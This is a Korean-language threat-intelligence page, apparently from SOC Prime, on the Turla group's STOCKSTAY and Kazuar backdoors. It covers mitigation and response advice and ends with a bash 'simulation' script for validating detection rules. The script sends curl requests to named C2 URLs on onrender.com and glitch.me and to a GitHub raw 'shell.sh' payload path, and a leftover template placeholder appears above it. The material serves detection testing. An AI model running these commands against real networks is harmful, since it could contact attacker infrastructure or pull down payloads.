SOC Prime Bias: 심각

14 Jul 2026 15:35 UTC

Turla (비밀 블리자드): STOCKSTAY 및 Kazuar 백도어 설명

Author Photo
SOC Prime Team linkedin icon 팔로우
Turla (비밀 블리자드): STOCKSTAY 및 Kazuar 백도어 설명
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

Turla는 FSB와 연계되어 있으며 정부 및 군사 목표에 대한 사이버 스파이 활동으로 유명한 오래된 러시아 정렬 APT 그룹입니다. 이 그룹은 STOCKSTAY 및 Kazuar 백도어를 포함한 맞춤형 악성코드에 의존하여 감염된 환경에서 장기적인 접근을 유지합니다. 또한 GitHub 및 Cloudflare와 같은 합법적인 클라우드 서비스를 자주 악용하여 명령 및 제어 트래픽을 위장합니다.

조사

이 보고서는 STOCKSTAY 및 Kazuar 패밀리에 초점을 맞춘 Turla의 악성코드 도구셋의 진화를 조사합니다. 이 그룹의 인프라 하이재킹 기술, 명령 및 제어를 위한 서버리스 플랫폼 사용, WinRAR 경로 탐색과 같은 취약점 악용 능력을 분석합니다. 또한 Turla의 환경 키잉 사용을 강조하여 샌드박스 분석에 대한 노출을 줄이는 방법도 다룹니다.

완화

조직은 트래픽 패턴이 비정상적인 경우 GitHub 및 Cloudflare와 같은 신뢰할 수 있는 웹 플랫폼의 무단 사용을 강력하게 모니터링해야 합니다. 취약점 CVE-2025-8088 과 같은 취약점을 신속하게 패치하는 것이 무단 파일 작성을 방지하는 데 필수적입니다. 또한 수비수들은 Turla 활동을 나타낼 수 있는 무단 루트 인증서 설치와 의심스러운 PowerShell 또는 VBScript 실행을 주의 깊게 주시해야 합니다.

대응

Turla 활동이 감지되면 응답자는 감염된 호스트를 격리하고 무단 로컬 관리자 계정을 조사해야 합니다. 합법적인 바이너리(예: NVIDIA 또는 Brother 프린터 유틸리티)를 포함하는 DLL 사이드 로딩을 파악하기 위해 프로세스 트리 세부 검토를 수행해야 합니다. 네트워크 원격 측정도 비정상적인 WebSocket 트래픽에 대해 확인하고 머신 신뢰 저장소는 의심스러운 인증서 변경에 대해 검토해야 합니다.

공격 흐름

시뮬레이션 실행

전제 조건: Telemetry & Baseline Pre-flight Check가 통과해야 합니다.

이유: 이 섹션은 감지 규칙을 유발하도록 설계된 적대 기술(TTP)의 정확한 실행을 상세히 설명합니다. 명령 및 서사는 확인된 TTP를 직접 반영하고 감지 논리에서 예상되는 정확한 원격 측정을 생성하려고 합니다. 추상적이거나 관련 없는 예는 오진을 유발할 수 있습니다.

  • 공격 서사 및 명령: 적대자는 성공적으로 발판을 잡았고 이제 C2 통신을 구축하려고 시도하고 있습니다. 탐지를 회피하기 위해 그들은 onrender.com 에 호스팅된 서버리스 플랫폼에 접근함으로써 “living-off-the-land” 접근 방식을 사용합니다. 동시에 개발자 트래픽과 섞이기 위해 공용 GitHub 저장소에서 2차 단계 페이로드를 가져오려고 시도합니다. 시뮬레이션은 curl and wscat (사용 가능한 경우) 또는 표준 웹 요청을 사용하여 감지 논리에서 정의된 특정 URL 패턴을 생성합니다.

  • 회귀 테스트 스크립트: [Provide the exact, self-contained, and executable code snippet for the simulation.]

    #!/bin/bash
    # STOCKSTAY C2 감지 검증을 위한 시뮬레이션 스크립트
    
    echo "[+] 시뮬레이션 시작: STOCKSTAY C2 TTPs"
    
    # 1. 트리거: Render(특정 URL)을 통한 WebSocket C2
    echo "[*] 악성 Render URL에 대한 WebSocket 연결을 시뮬레이트 중..."
    curl -k "wss://google-ai-labs-it.onrender.com/ws"
    
    # 2. 트리거: Glitch(특정 URL)을 통한 WebSocket C2
    echo "[*] 악성 Glitch URL에 대한 WebSocket 연결을 시뮬레이트 중..."
    curl -k "wss://wool-basalt-clock.glitch.me/ws"
    
    # 3. 트리거: GitHub 스테이징 (광범위 도메인 일치)
    echo "[*] GitHub를 통한 페이로드 스테이징 시뮬레이트 중..."
    curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh"
    
    echo "[+] 시뮬레이션 완료. SIEM에서 경고를 확인하십시오."
  • 정리 명령:

    # 이 시뮬레이션은 호스트에 지속적인 아티팩트를 생성하지 않습니다.
    # 생성된 모든 임시 bash 파일이 제거되었는지 확인하십시오.
    rm -f simulation_stockstay.sh